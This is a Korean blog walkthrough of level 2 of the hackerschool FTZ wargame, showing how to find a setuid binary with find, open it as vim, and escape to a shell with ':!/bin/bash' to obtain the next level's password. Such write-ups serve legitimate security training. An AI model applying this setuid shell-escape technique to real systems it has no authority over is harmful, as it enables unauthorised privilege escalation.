Media Log


 사람마다 푸는 방식이 다를 수 있으니. 어려움에 있으실 때 참조만 하시고, 직접 풀어보시는 것 을 추천합니다.



구동 환경 : Windows 7 

서버 환경 : VMware WorkStation 10.0 Redhat9.0 hackerschool FTZ

사용 플램 : putty (퓨티)


Level1을 클리어하신 것을 축하드립니다.

레벨20단계까지 있는데 꾸준히 열심히 하셔서 클리어 하시길 바랍니다.


잔말 하지않고 바로시작!

login as : level2

password :


level1에서 끝냈을 때 받았던 비밀번호를 입력 해준 다음에 로그인 하면 된다.


그러면 저번과 같이 ls -al 로 level2의 디텍토리에는 무슨 파일들이 존재하는지 확인해보자.


[level2@ftz level2]$ ls -al

total 80

drwxr-xr-x    4 root     level2       4096 Apr 19  2002 .

drwxr-xr-x   34 root     root         4096 Sep 30 02:00 ..

-rw-------    1 root     root            1 Jan 15  2010 .bash_history

-rw-r--r--    1 root     root           24 Feb 24  2002 .bash_logout

-rw-r--r--    1 root     root          224 Feb 24  2002 .bash_profile

-rw-r--r--    1 root     root          151 Feb 24  2002 .bashrc

-rw-r--r--    1 root     root          400 Sep 24  2000 .cshrc

-rw-r--r--    1 root     root         4742 Sep 24  2000 .emacs

-rw-rw-r--    1 root     root          162 Mar 10  2000 .epems

-r--r--r--    1 root     root          319 Sep 24  2000 .gtkrc

-rw-r--r--    1 root     root          100 Sep 24  2000 .gvimrc

-rw-r--r--    1 root     root           60 Mar 23  2000 hint

-rw-r--r--    1 root     root          226 Sep 24  2000 .muttrc

-rw-r--r--    1 root     root          367 Sep 24  2000 .profile

drwxr-xr-x    2 root     level2       4096 Feb 24  2002 public_html

drwxrwxr-x    2 root     level2       4096 Sep 30 06:28 tmp

-rw-r--r--    1 root     root            0 Oct 27  2002 .viminfo

-rw-r--r--    1 root     root         4145 Sep 24  2000 .vimrc

-rw-r--r--    1 root     root          245 Sep 24  2000 .Xdefaults

[level2@ftz level2]$


이번 level2의 디텍토리에도 hint 라는 파일이 존재한다.

cat 명령어로 hint 파일을 들여다보자.


[level2@ftz level2]$ cat hint


텍스트 파일 편집 중 쉘의 명령을 실행시킬 수 있다는데...


???????????????????!!!

처음에 했던 나도 이 부분에서 뭐지? 이게 힌트인건가 이런 생각을 가지게 되었다.

그러나,


곰곰히 생각해보면 무슨 editor 가 생각이 날 것이다. 해커스쿨 초중고 를 다 읽은 사람이라면!

아직은 잘 모르겠다면 이제 다음으로 넘어가자.


find 명령어로 setuid 가 걸린 부분을 찾으러 가보자 고고씽.


[level2@ftz level2]$ find / -user level3 -perm -4300 2>/dev/null

/usr/bin/editor

[level2@ftz level2]$


찾아보니, Level3의 root 권한을 가진 setuid 가 발견되었다.

그럼 거기로 경로를 이동하자.

아차! editor는 실행파일인 것 같다.


[level2@ftz level2]$ cd /usr/bin

[level2@ftz bin]$ ls editor

editor

[level2@ftz bin]$


역시 editor 는 실행하는 파일이었다.

./ 명령어로 editor 를 실행해보자!


[level2@ftz bin]$ ./editor

~

~

~

~

~

~                              VIM - Vi IMproved

~

~                               version 6.1.320

~                           by Bram Moolenaar et al.

~                 Vim is open source and freely distributable

~

~                        Help poor children in Uganda!

~                type  :help iccf<Enter>       for information

~

~                type  :q<Enter>               to exit

~                type  :help<Enter>  or  <F1>  for on-line help

~                type  :help version6<Enter>   for version info

~

~

~

~

~


!?!?!?!?!?!? 

editor 를 열어보니 Vi 에디터가 나왔다!


VI(Visual Editor) ?

유닉스 시스템에서 주로 사용하는 텍스트 편집기. vi는 그래픽 사용자 인터페이스(GUI)가 익숙한 사용자에게는 매우 낯설은 에디터지만 프로그래머 등 텍스트 작업을 주로 하는 사용자에게는 간결한 인터페이스와 키보드를 벗어나지 않고 모든 일을 할 수 있는 막강한 기능으로 크게 환영받고 있다. 파일의 간단한 편집, 전자 우편 쓰기, 복잡한 프로그래밍까지 vi는 유닉스 시스템에 널리 사용되고 있는 편집기이다


Vi 에디터에 대한 설명은 여기에 적지않겠지만, 네이버에 검색해보면 많은 자료들이 나온다! 심지어 사용법까지 +_+

Vi 에디터에서 Shift + : 를 눌러주면 입력모드로 변환된다.


~

~

~

~

~

~                              VIM - Vi IMproved

~

~                               version 6.1.320

~                           by Bram Moolenaar et al.

~                 Vim is open source and freely distributable

~

~                        Help poor children in Uganda!

~                type  :help iccf<Enter>       for information

~

~                type  :q<Enter>               to exit

~                type  :help<Enter>  or  <F1>  for on-line help

~                type  :help version6<Enter>   for version info

~

~

~

~

: !/bin/bash


! 가 무엇인가요?

! 는 VI editor 에서 외부의 쉘을 실행시켜주는 명령어입니다.

Level3의/bin/bash 로 접속하게 해주지요.


[level3@ftz bin] 으로 변경되었다면, my-pass 를 입력하자.

[level3@ftz bin]$ my-pass

Level3 Password is ~~~~~~~~~~~~

[level3@ftz bin]$


그러면 3단계도 클리어 되었다.

성공. success.


어렵지않게 풀 수 있었던 문제들이었다. 처음에 접할 때 Vi Editor 에 대한 사용법만 공부한다면 푸는데 문제가 없는 문제.



'Wargame > hackschool FTZ' 카테고리의 다른 글

hackerschool FTZ : level4 풀이  (1) 2013.10.01
hackerschool FTZ : level3 풀이  (0) 2013.10.01
hackerschool FTZ : level2 풀이  (2) 2013.10.01
hackerschool FTZ : level1 풀이  (0) 2013.10.01
hackerschool FTZ : Training 10  (1) 2013.09.30
hackerschool FTZ : Training 6~8  (0) 2013.09.30
  1. 1245 at 2017.06.06 13:04 [edit/del]

    님 저 님처럼 ./editor 하니까 접근 불가인가 허가 거부 났어요 뭐죠 하? 참나

    Reply

submit